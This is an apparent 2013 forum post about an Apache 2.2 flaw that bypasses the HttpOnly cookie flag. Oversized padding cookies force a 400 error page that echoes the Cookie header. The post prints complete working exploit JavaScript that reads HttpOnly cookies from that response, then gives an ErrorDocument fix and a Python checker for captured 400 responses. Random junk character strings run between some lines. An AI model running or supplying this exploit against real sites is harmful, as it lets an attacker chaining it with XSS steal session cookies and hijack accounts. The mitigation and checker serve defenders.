中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Apache HttpOnly Cookie XSS cross-site vulnerability

Author: admin    Time: 2013-4-19 19:15
Many programs, including a number of commercial and mature open-source CMS/article systems, set the HttpOnly attribute on cookies to stop XSS from stealing user cookies: JavaScript can then no longer read the cookie directly, which reduces the impact of an XSS. The issue described here can be used to bypass exactly that HttpOnly attribute.

Open a site in Chrome, press F12 to open the developer tools, find the console, enter the following code and press Enter:

// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value (819 bytes of "x")
    var str = "";
    for (var i = 0; i < 819; i++) {
        str += "x";
    }
    // Set cookies: ten of them, enough to push the Cookie: request header past the server limit
    for (i = 0; i < 10; i++) {
        var cookie;
        if (good) {
            // Expire evil cookie
            cookie = "xss" + i + "=;expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;";
        } else {
            // Set evil cookie
            cookie = "xss" + i + "=" + str + ";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the padding cookies, then split the remaining ones
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i = 0; i < cookies.length; i++) {
                    var s_c = cookies[i].trim().split('=', 2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}
makeRequest();

You will then see a glorious 400 error page that contains the cookie information: the padding cookies make the request header exceed the server's limit, and an unpatched Apache echoes the offending Cookie header, HttpOnly cookies included, in the body of the 400 page, where script can read it through the XHR response.

Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download
9 g4 d* U7 ~- d1 j& H( X
Fix:

Apache officially provides four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument), as follows:
- `  n( d- B/ _: L) y0 ]6 N
In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error

In testing, only method 2 is effective for the 400 error: the response no longer contains the cookie contents.

Apache configuration:

ErrorDocument 400 "security test"
2 F+ {: S" i0 B  Q$ G5 f% g: V% @* F
Of course, upgrading Apache to the latest version also works :).
Reference: http://httpd.apache.org/security/vulnerabilities_22.html
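A defender-side check, added here as an example and not part of the post or the linked gist: given a captured 400 response, it reports whether the error page echoes the Cookie request header, so the ErrorDocument fix above can be verified against a real response. Both sample bodies are constructed; the vulnerable one mimics the default Apache 2.2 400 page, the fixed one is the text message from the configuration above.

```python
import re

# Constructed sample of an unpatched Apache 2.2.x "400 Bad Request" page:
# the offending request header (here the Cookie) is echoed inside <pre>.
VULNERABLE_BODY = """<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br />
Size of a request header field exceeds server limit.<br />
<pre>
Cookie: session=abc123; xss0=xxxx
</pre>
</p>
</body></html>
"""

# Constructed sample of the body once ErrorDocument 400 is set to a plain message.
FIXED_BODY = "security test"


def reflected_headers(body: str) -> dict:
    """Return {name: value} for every request header echoed inside a <pre> block."""
    found = {}
    for block in re.findall(r"<pre>(.*?)</pre>", body, re.S | re.I):
        for line in block.splitlines():
            m = re.match(r"([A-Za-z][A-Za-z0-9-]*):\s*(.*)", line.strip())
            if m:
                found[m.group(1)] = m.group(2)
    return found


def error_page_leaks_cookie(status: int, body: str) -> bool:
    """True when a 400 response body echoes the Cookie header (the leak this post describes)."""
    if status != 400:
        return False
    return "Cookie" in reflected_headers(body)


if __name__ == "__main__":
    for label, body in (("unpatched", VULNERABLE_BODY), ("ErrorDocument set", FIXED_BODY)):
        print(label, "leaks Cookie header:", error_page_leaks_cookie(400, body))
```

Feed it the status and body of a 400 response captured from your own server (for example from the browser's network panel) to confirm the mitigation took effect.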

Welcome to 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2